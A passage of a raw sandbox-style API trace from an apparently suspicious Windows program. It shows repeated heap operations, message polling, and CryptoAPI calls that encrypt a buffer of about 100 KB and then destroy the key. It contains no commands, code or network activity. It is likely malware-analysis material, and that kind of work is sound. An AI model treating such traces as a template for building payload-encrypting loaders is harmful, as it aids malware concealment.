hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.059] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2748, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2748*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.060] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.060] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.060] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.060] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.061] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.062] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.062] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18c81, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18c90) returned 1 [0187.062] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.062] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.062] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.062] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.062] CharLowerBuffW (in: lpsz="byte[101521]", cchLength=0xc | out: lpsz="byte[101521]") returned 0xc [0187.062] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.064] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.064] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.064] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa90928*, pdwDataLen=0x87e820*=0x18c81, dwBufLen=0x18c90 | out: pbData=0xa90928*, pdwDataLen=0x87e820*=0x18c90) returned 1 [0187.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0187.065] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.067] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.068] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.068] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.068] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.068] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0187.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.068] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.068] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.068] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.069] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.069] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0187.069] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.080] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.080] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.081] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.081] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0187.081] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.081] CryptDestroyKey (hKey=0x90af98) returned 1 [0187.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.081] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.081] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.081] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.081] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.081] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0187.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0187.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0187.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.082] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.082] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.082] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0187.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0187.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.083] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.083] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 